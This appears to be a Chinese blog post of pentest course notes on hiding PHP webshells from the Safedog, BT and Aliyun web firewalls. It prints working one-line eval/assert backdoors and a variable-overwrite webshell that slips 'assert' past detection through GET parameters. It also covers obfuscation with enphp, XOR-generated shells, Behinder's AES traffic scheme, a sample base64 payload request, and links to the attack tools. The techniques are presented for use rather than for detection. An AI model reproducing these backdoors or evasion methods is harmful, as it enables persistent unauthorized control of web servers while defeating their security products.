本文探讨了如何通过变量覆盖、加密混淆、异或生成等手段,避开Safedog、BT和Aliyun的安全防护,实现后门代码的隐匿执行。实例包括原型后门、菜刀工具原理、冰蝎加密流程,以及针对不同平台的定制化绕过策略。重点介绍了自定义编码和控制器编写来规避WAF指纹识别。
思维导图
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-F6lVKsnS-1649647185215)(image48/权限控制.png)]](https://i-blog.csdnimg.cn/blog_migrate/a4d8bfe63e9dbf06d9f8c423ab07c9eb.png)
Safedog 代码层手写及脚本绕过
变量覆盖,加密混淆,异或生成
BT Aliyun 代码层手写及脚本绕过
编码解码(变量覆盖,加密混淆,异或生成)
ASP,PHP,ASPX,JSP,PY 等后门免杀同理
一句话后门的原理:
<?php@eval($_POST['password']) ?>
- @再php中含义为后面如果执行错误不会报错
- eval()函数表示括号里的语句全做代码执行
- $_POST[‘password’]`表示从页面中以post方式获取变量password的值。
菜刀、蚂剑、冰蝎工具的基本原理
把一些具体执行语句集成化(各种各样在功能语句都帮你写好了),你直接连接执行就可!
菜刀,蚁剑,冰蝎优缺点
菜刀:未更新状态,无插件,单向加密传输
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,偏向于后渗透,双向加密传输
冰蝎加密原理
冰蝎"在服务端支持open_ssl时,使用AES加密算法,密钥长度16位,也可称为AES-16。此在软件及硬件(英特尔处理器的AES指令集包含六条指令)上都能快速地加解密,内存需求低,非常适合流量加密。
加密流程
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cNmdc5xO-1649647185218)(image48/48-28.jpeg)]](https://i-blog.csdnimg.cn/blog_migrate/d056a90a7851d0d16252b6a2b34ed0e4.jpeg)
首先客户端以Get形式发起带密码的请求。
服务端产生随机密钥,将密钥写入Session并将密钥返回客户端。
客户端获取密钥后,将payload用AES算法加密,用POST形式发送请求。
服务端收到请求,用Session中的密钥解密请求的Body部分,之后执行Payload,将直接结果返回到客户端。
客户端获取返回结果,显示到UI界面上。
变量覆盖
原型后门
<?php assert($_POST['chopper'])?>
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZRoCSQEQ-1649647185219)(image48/48-0.png)]](https://i-blog.csdnimg.cn/blog_migrate/d9a1dd3c6d9131257dccedd83f89608e.png)
安全狗轻而易举就查到木马
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-txqwFuOY-1649647185220)(image48/48-1.png)]](https://i-blog.csdnimg.cn/blog_migrate/c9b5989aebb4c8e573d7ef374f4bf2e7.png)
变量覆盖
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ahz5j5Rj-1649647185220)(image48/48-5.png)]](https://i-blog.csdnimg.cn/blog_migrate/e86263c38918accaaa204ee31828a9ef.png)
<?php
$a = $_GET['x'];
$$a = $_GET['y'];
$b($_POST['z']);
//?x=b&y=assert
//$a = b
//$$a ->$b 变量引用
//$b= assert
//$b($_POST['z']);--->assert($_POST['z'])
?>
把敏感字符传递的参数中,waf能够确定你的代码,但是确定不了你传递的参数值
safedog有变量追踪
简单的拆分,直接报马
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W759tuas-1649647185221)(image48/48-6.png)]](https://i-blog.csdnimg.cn/blog_migrate/0a59a8e6901cd325010fe14ee401d2e3.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TOiYucfs-1649647185222)(image48/48-9.png)]](https://i-blog.csdnimg.cn/blog_migrate/0fea277e4cb7d77da530060b4a46e0ee.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XXkZ3ZwJ-1649647185222)(image48/48-8.png)]](https://i-blog.csdnimg.cn/blog_migrate/c398036b2b73167657eaa96ce8ef37ea.png)
原型效果
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QdbYkfMe-1649647185223)(image48/48-10.png)]](https://i-blog.csdnimg.cn/blog_migrate/2c129c6349f6fd6f93ebb4dc4417abf8.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qyYom7Yh-1649647185223)(image48/48-2.png)]](https://i-blog.csdnimg.cn/blog_migrate/cfe1faf3e1a2ccce83c1e4b8e9e8ca3c.png)
变量覆盖效果(本地safedog测试)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yN2LqXHV-1649647185224)(image48/48-7.png)]](https://i-blog.csdnimg.cn/blog_migrate/f0b5cc755ceb581b39723a43f25359dd.png)
变量覆盖效果(aliyun+safedog +bt 测试)
被BT拦截
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bcQGnOwZ-1649647185224)(image48/48-12.png)]](https://i-blog.csdnimg.cn/blog_migrate/b4eb09525e0958595ddb82d56137532b.png)
传入值触发防护规则
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nseSB5uX-1649647185225)(image48/48-11.png)]](https://i-blog.csdnimg.cn/blog_migrate/208a4791e3bacb2e9729a4769f09e8f0.png)
加密绕过即可
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6oelY00R-1649647185225)(image48/48-15.png)]](https://i-blog.csdnimg.cn/blog_migrate/3ea332aa5e141783e2f493a4fc337680.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HQJhrwsu-1649647185226)(image48/48-13.png)]](https://i-blog.csdnimg.cn/blog_migrate/495e2d7fc179cd7fbb74306c37190e0f.png)
稳定、可靠
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DUJReJJ9-1649647185226)(image48/48-14.png)]](https://i-blog.csdnimg.cn/blog_migrate/21e9f035590f81f81f0b83f8bf14f037.png)
加密混淆
enphp工具
运行
php.exe code_test.php
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bNjq4m4S-1649647185227)(image48/48-17.png)]](https://i-blog.csdnimg.cn/blog_migrate/7262556ab8a228288d993a375bd1ac6d.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3UJTRJUB-1649647185227)(image48/48-18.png)]](https://i-blog.csdnimg.cn/blog_migrate/d618b1684c11d6de175deba5f168ca66.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VeCxTMgf-1649647185228)(image48/48-16.png)]](https://i-blog.csdnimg.cn/blog_migrate/accc45bd97d8845f7799a8dfd68c205c.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5kBzjNmD-1649647185228)(image48/48-19.png)]](https://i-blog.csdnimg.cn/blog_migrate/148359a3595c8d50abde930e978c1cc6.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SCV6DF88-1649647185229)(image48/48-20.png)]](https://i-blog.csdnimg.cn/blog_migrate/e5a803cf188696cd8bc508ba5b0de347.png)
网络接口加密(更稳)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kfee3KNj-1649647185229)(image48/48-21.png)]](https://i-blog.csdnimg.cn/blog_migrate/fe32763138ee4668052c0c27fe77d755.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WeNW5Py8-1649647185229)(image48/48-22.png)]](https://i-blog.csdnimg.cn/blog_migrate/2a28fee88955090ae680ddcd922e1f04.png)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OqLCcAQi-1649647185230)(image48/48-23.png)]](https://i-blog.csdnimg.cn/blog_migrate/bfa26af73809f50516eab3f632474e8c.png)
依旧很稳
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PnTSmmGv-1649647185230)(image48/48-24.png)]](https://i-blog.csdnimg.cn/blog_migrate/beaef445c07df22dba2c6e74bc8067d1.png)
异或生成
webshell-venom-master工具
直接运行程序,即可生成webshell
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aklxeZpy-1649647185230)(image48/48-25.png)]](https://i-blog.csdnimg.cn/blog_migrate/42aa575bd9f097c8783741c9fa389e9d.png)
免杀
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nhyVXl3h-1649647185231)(image48/48-26.png)]](https://i-blog.csdnimg.cn/blog_migrate/72e7a8fc6728731b17934c2ad6f20543.png)
很稳
http://test.xiaodi8.com/x.php?id=x
mr6=cGhwaW5mbygpOw==
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W3bp2w43-1649647185231)(image48/48-27.png)]](https://i-blog.csdnimg.cn/blog_migrate/1a93cbffa31be746587434e00347c3d4.png)
行为造轮子
waf基本都有菜刀、蚁剑、冰蝎的指纹,当你使用他们的时候,一些危害行为会被拦截!
要想不被识别拦截,只能自己造轮子!
自己写数据包,不会有那些指纹特征,就能实现功能!
扫描目录
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eonCWARz-1649647185232)(image48/48-32.png)]](https://i-blog.csdnimg.cn/blog_migrate/b11e9f68f0d325f2110bb4e7d46e9d7a.png)
写入文件
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bp1PI60J-1649647185232)(image48/48-33.png)]](https://i-blog.csdnimg.cn/blog_migrate/479953bc45adfdbb516364520639d104.png)
手写手写新型控制器
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dpJ7uBx3-1649647185232)(image48/48-37.png)]](https://i-blog.csdnimg.cn/blog_migrate/3e359db05a2b45e46ccfaa1b980f3921.png)
演示案例
Safedog-手写覆盖变异简易代码绕过-代码层
Safedog-基于接口类加密混淆代码绕过-代码层
BT,Aliyun-基于覆盖加密变异下编码解码绕过-代码层
Safedog-基于工具功能数据包指纹修改变异绕过-行为层
Safedog,BT,Aliyun-基于冰蝎新型控制器绕过全面测试-行为层
Safedog,BT,Aliyun-基于手写新型控制器绕过全面测试-行为层
涉及资源:
https://github.com/djunny/enphp
https://www.phpjiami.com/phpjiami.html
https://github.com/rebeyond/Behinder/releases/
https://github.com/AntSwordProject/antSword/releases
https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:
xiao
扫一扫
1558
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
